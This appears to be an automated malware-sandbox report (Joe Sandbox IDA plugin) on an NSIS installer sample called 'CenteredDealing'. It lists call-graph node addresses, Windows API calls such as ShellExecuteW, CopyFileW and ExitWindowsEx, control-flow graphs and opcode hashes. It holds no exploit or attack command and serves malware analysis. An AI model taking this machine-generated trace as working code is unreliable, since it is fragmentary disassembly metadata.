40145c 18 API calls 4961->4962 4963 401d95 ExpandEnvironmentStringsW 4962->4963 4964 401da8 4963->4964 4966 401db9 4963->4966 4965 401dad lstrcmpW 4964->4965 4964->4966 4965->4966 4967 401e0f 4968 401446 18 API calls 4967->4968 4969 401e17 4968->4969 4970 401446 18 API calls 4969->4970 4971 401e21 4970->4971 4972 4030e3 4971->4972 4974 405f51 wsprintfW 4971->4974 4974->4972 4975 402392 4976 40145c 18 API calls 4975->4976 4977 402399 4976->4977 4980 4071f8 4977->4980 4981 406ed2 25 API calls 4980->4981 4982 407218 4981->4982 4983 407222 lstrcpynW lstrcmpW 4982->4983 4984 4023a7 4982->4984 4985 407254 4983->4985 4986 40725a lstrcpynW 4983->4986 4985->4986 4986->4984 4056 402713 4071 406009 lstrcpynW 4056->4071 4058 40272c 4072 406009 lstrcpynW 4058->4072 4060 402738 4061 40145c 18 API calls 4060->4061 4063 402743 4060->4063 4061->4063 4062 402752 4065 40145c 18 API calls 4062->4065 4067 402761 4062->4067 4063->4062 4064 40145c 18 API calls 4063->4064 4064->4062 4065->4067 4066 40145c 18 API calls 4068 40276b 4066->4068 4067->4066 4069 4062a3 11 API calls 4068->4069 4070 40277f WritePrivateProfileStringW 4069->4070 4071->4058 4072->4060 4987 402797 4988 40145c 18 API calls 4987->4988 4989 4027ae 4988->4989 4990 40145c 18 API calls 4989->4990 4991 4027b7 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027c0 GetPrivateProfileStringW lstrcmpW 4992->4993 4994 402e18 4995 40145c 18 API calls 4994->4995 4996 402e1f FindFirstFileW 4995->4996 4997 402e32 4996->4997 5002 405f51 wsprintfW 4997->5002 4999 402e43 5003 406009 lstrcpynW 4999->5003 5001 402e50 5002->4999 5003->5001 5004 401e9a 5005 40145c 18 API calls 5004->5005 5006 401ea1 5005->5006 5007 401446 18 API calls 5006->5007 5008 401eab wsprintfW 5007->5008 4284 401a1f 4285 40145c 18 API calls 4284->4285 4286 401a26 4285->4286 4287 4062a3 11 API calls 4286->4287 4288 401a49 4287->4288 4289 401a64 4288->4289 4290 401a5c 4288->4290 4338 406009 lstrcpynW 4289->4338 4337 406009 lstrcpynW 4290->4337 4293 401a62 4297 406038 5 API calls 4293->4297 4294 401a6f 4295 406722 3 API calls 4294->4295 4296 401a75 lstrcatW 4295->4296 4296->4293 4299 401a81 4297->4299 4298 4062d5 2 API calls 4298->4299 4299->4298 4300 405e30 2 API calls 4299->4300 4302 401a98 CompareFileTime 4299->4302 4303 401ba9 4299->4303 4307 4062a3 11 API calls 4299->4307 4311 406009 lstrcpynW 4299->4311 4317 406805 18 API calls 4299->4317 4324 405ca0 MessageBoxIndirectW 4299->4324 4328 401b50 4299->4328 4335 401b5d 4299->4335 4336 405e50 GetFileAttributesW CreateFileW 4299->4336 4300->4299 4302->4299 4304 404f72 25 API calls 4303->4304 4306 401bb3 4304->4306 4305 404f72 25 API calls 4308 401b70 4305->4308 4309 40337f 37 API calls 4306->4309 4307->4299 4312 4062a3 11 API calls 4308->4312 4310 401bc6 4309->4310 4313 4062a3 11 API calls 4310->4313 4311->4299 4319 401b8b 4312->4319 4314 401bda 4313->4314 4315 401be9 SetFileTime 4314->4315 4316 401bf8 CloseHandle 4314->4316 4315->4316 4318 401c09 4316->4318 4316->4319 4317->4299 4320 401c21 4318->4320 4321 401c0e 4318->4321 4323 406805 18 API calls 4320->4323 4322 406805 18 API calls 4321->4322 4325 401c16 lstrcatW 4322->4325 4326 401c29 4323->4326 4324->4299 4325->4326 4327 4062a3 11 API calls 4326->4327 4329 401c34 4327->4329 4330 401b93 4328->4330 4331 401b53 4328->4331 4332 405ca0 MessageBoxIndirectW 4329->4332 4333 4062a3 11 API calls 4330->4333 4334 4062a3 11 API calls 4331->4334 4332->4319 4333->4319 4334->4335 4335->4305 4336->4299 4337->4293 4338->4294 5009 40209f GetDlgItem GetClientRect 5010 40145c 18 API calls 5009->5010 5011 4020cf LoadImageW SendMessageW 5010->5011 5012 4030e3 5011->5012 5013 4020ed DeleteObject 5011->5013 5013->5012 5014 402b9f 5015 401446 18 API calls 5014->5015 5020 402ba7 5015->5020 5016 402c4a 5017 402bdf ReadFile 5019 402c3d 5017->5019 5017->5020 5018 401446 18 API calls 5018->5019 5019->5016 5019->5018 5026 402d17 ReadFile 5019->5026 5020->5016 5020->5017 5020->5019 5021 402c06 MultiByteToWideChar 5020->5021 5022 402c3f 5020->5022 5024 402c4f 5020->5024 5021->5020 5021->5024 5027 405f51 wsprintfW 5022->5027 5024->5019 5025 402c6b SetFilePointer 5024->5025 5025->5019 5026->5019 5027->5016 5028 402b23 GlobalAlloc 5029 402b39 5028->5029 5030 402b4b 5028->5030 5031 401446 18 API calls 5029->5031 5032 40145c 18 API calls 5030->5032 5033 402b41 5031->5033 5034 402b52 WideCharToMultiByte lstrlenA 5032->5034 5035 402b93 5033->5035 5036 402b84 WriteFile 5033->5036 5034->5033 5036->5035 5037 402384 GlobalFree 5036->5037 5037->5035 5039 4044a5 5040 404512 5039->5040 5041 4044df 5039->5041 5043 40451f GetDlgItem GetAsyncKeyState 5040->5043 5050 4045b1 5040->5050 5107 405c84 GetDlgItemTextW 5041->5107 5046 40453e GetDlgItem 5043->5046 5053 40455c 5043->5053 5044 4044ea 5047 406038 5 API calls 5044->5047 5045 40469d 5105 404833 5045->5105 5109 405c84 GetDlgItemTextW 5045->5109 5048 403d3f 19 API calls 5046->5048 5049 4044f0 5047->5049 5052 404551 ShowWindow 5048->5052 5055 403e74 5 API calls 5049->5055 5050->5045 5056 406805 18 API calls 5050->5056 5050->5105 5052->5053 5058 404579 SetWindowTextW 5053->5058 5063 405d59 4 API calls 5053->5063 5054 403dca 8 API calls 5059 404847 5054->5059 5060 4044f5 GetDlgItem 5055->5060 5061 40462f SHBrowseForFolderW 5056->5061 5057 4046c9 5062 40677e 18 API calls 5057->5062 5064 403d3f 19 API calls 5058->5064 5065 404503 IsDlgButtonChecked 5060->5065 5060->5105 5061->5045 5066 404647 CoTaskMemFree 5061->5066 5067 4046cf 5062->5067 5068 40456f 5063->5068 5069 404597 5064->5069 5065->5040 5070 406722 3 API calls 5066->5070 5110 406009 lstrcpynW 5067->5110 5068->5058 5074 406722 3 API calls 5068->5074 5071 403d3f 19 API calls 5069->5071 5072 404654 5070->5072 5075 4045a2 5071->5075 5076 40468b SetDlgItemTextW 5072->5076 5081 406805 18 API calls 5072->5081 5074->5058 5108 403d98 SendMessageW 5075->5108 5076->5045 5077 4046e6 5079 4062fc 3 API calls 5077->5079 5088 4046ee 5079->5088 5080 4045aa 5084 4062fc 3 API calls 5080->5084 5082 404673 lstrcmpiW 5081->5082 5082->5076 5085 404684 lstrcatW 5082->5085 5083 404730 5111 406009 lstrcpynW 5083->5111 5084->5050 5085->5076 5087 404739 5089 405d59 4 API calls 5087->5089 5088->5083 5093 406751 2 API calls 5088->5093 5094 404785 5088->5094 5090 40473f GetDiskFreeSpaceW 5089->5090 5092 404763 MulDiv 5090->5092 5090->5094 5092->5094 5093->5088 5096 4047e2 5094->5096 5097 4043ad 21 API calls 5094->5097 5095 404805 5112 403d85 KiUserCallbackDispatcher 5095->5112 5096->5095 5098 40141d 80 API calls 5096->5098 5099 4047d3 5097->5099 5098->5095 5101 4047e4 SetDlgItemTextW 5099->5101 5102 4047d8 5099->5102 5101->5096 5103 4043ad 21 API calls 5102->5103 5103->5096 5104 404821 5104->5105 5113 403d61 5104->5113 5105->5054 5107->5044 5108->5080 5109->5057 5110->5077 5111->5087 5112->5104 5114 403d74 SendMessageW 5113->5114 5115 403d6f 5113->5115 5114->5105 5115->5114 5116 402da5 5117 4030e3 5116->5117 5118 402dac 5116->5118 5119 401446 18 API calls 5118->5119 5120 402db8 5119->5120 5121 402dbf SetFilePointer 5120->5121 5121->5117 5122 402dcf 5121->5122 5122->5117 5124 405f51 wsprintfW 5122->5124 5124->5117 5125 4030a9 SendMessageW 5126 4030c2 InvalidateRect 5125->5126 5127 4030e3 5125->5127 5126->5127 5128 401cb2 5129 40145c 18 API calls 5128->5129 5130 401c54 5129->5130 5131 4062a3 11 API calls 5130->5131 5134 401c64 5130->5134 5132 401c59 5131->5132 5133 406c9b 81 API calls 5132->5133 5133->5134 4083 4021b5 4084 40145c 18 API calls 4083->4084 4085 4021bb 4084->4085 4086 40145c 18 API calls 4085->4086 4087 4021c4 4086->4087 4088 40145c 18 API calls 4087->4088 4089 4021cd 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021d6 4090->4091 4092 404f72 25 API calls 4091->4092 4093 4021e2 ShellExecuteW 4092->4093 4094 40221b 4093->4094 4095 40220d 4093->4095 4097 4062a3 11 API calls 4094->4097 4096 4062a3 11 API calls 4095->4096 4096->4094 4098 402230 4097->4098 5142 402238 5143 40145c 18 API calls 5142->5143 5144 40223e 5143->5144 5145 4062a3 11 API calls 5144->5145 5146 40224b 5145->5146 5147 404f72 25 API calls 5146->5147 5148 402255 5147->5148 5149 405c3f 2 API calls 5148->5149 5150 40225b 5149->5150 5151 4062a3 11 API calls 5150->5151 5154 4022ac CloseHandle 5150->5154 5157 40226d 5151->5157 5153 4030e3 5154->5153 5155 402283 WaitForSingleObject 5156 402291 GetExitCodeProcess 5155->5156 5155->5157 5156->5154 5159 4022a3 5156->5159 5157->5154 5157->5155 5158 406332 2 API calls 5157->5158 5158->5155 5161 405f51 wsprintfW 5159->5161 5161->5154 5162 4040b8 5163 4040d3 5162->5163 5171 404201 5162->5171 5167 40410e 5163->5167 5193 403fca WideCharToMultiByte 5163->5193 5164 40426c 5165 404276 GetDlgItem 5164->5165 5166 40433e 5164->5166 5168 404290 5165->5168 5169 4042ff 5165->5169 5172 403dca 8 API calls 5166->5172 5174 403d3f 19 API calls 5167->5174 5168->5169 5177 4042b6 6 API calls 5168->5177 5169->5166 5178 404311 5169->5178 5171->5164 5171->5166 5173 40423b GetDlgItem SendMessageW 5171->5173 5176 404339 5172->5176 5198 403d85 KiUserCallbackDispatcher 5173->5198 5175 40414e 5174->5175 5180 403d3f 19 API calls 5175->5180 5177->5169 5181 404327 5178->5181 5182 404317 SendMessageW 5178->5182 5185 40415b CheckDlgButton 5180->5185 5181->5176 5186 40432d SendMessageW 5181->5186 5182->5181 5183 404267 5184 403d61 SendMessageW 5183->5184 5184->5164 5196 403d85 KiUserCallbackDispatcher 5185->5196 5186->5176 5188 404179 GetDlgItem 5197 403d98 SendMessageW 5188->5197 5190 40418f SendMessageW 5191 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5190->5191 5192 4041ac GetSysColor 5190->5192 5191->5176 5192->5191 5194 404007 5193->5194 5195 403fe9 GlobalAlloc WideCharToMultiByte 5193->5195 5194->5167 5195->5194 5196->5188 5197->5190 5198->5183 4192 401eb9 4193 401f24 4192->4193 4194 401ec6 4192->4194 4195 401f53 GlobalAlloc 4193->4195 4196 401f28 4193->4196 4197 401ed5 4194->4197 4204 401ef7 4194->4204 4198 406805 18 API calls 4195->4198 4203 4062a3 11 API calls 4196->4203 4208 401f36 4196->4208 4199 4062a3 11 API calls 4197->4199 4202 401f46 4198->4202 4200 401ee2 4199->4200 4205 402708 4200->4205 4210 406805 18 API calls 4200->4210 4202->4205 4206 402387 GlobalFree 4202->4206 4203->4208 4214 406009 lstrcpynW 4204->4214 4206->4205 4216 406009 lstrcpynW 4208->4216 4209 401f06 4215 406009 lstrcpynW 4209->4215 4210->4200 4212 401f15 4217 406009 lstrcpynW 4212->4217 4214->4209 4215->4212 4216->4202 4217->4205 5199 4074bb 5201 407344 5199->5201 5200 407c6d 5201->5200 5202 4073c2 GlobalFree 5201->5202 5203 4073cb GlobalAlloc 5201->5203 5204 407443 GlobalAlloc 5201->5204 5205 40743a GlobalFree 5201->5205 5202->5203 5203->5200 5203->5201 5204->5200 5204->5201 5205->5204

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                                                                                                                                Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 OleUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                                                                                                                                Function 00406805 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
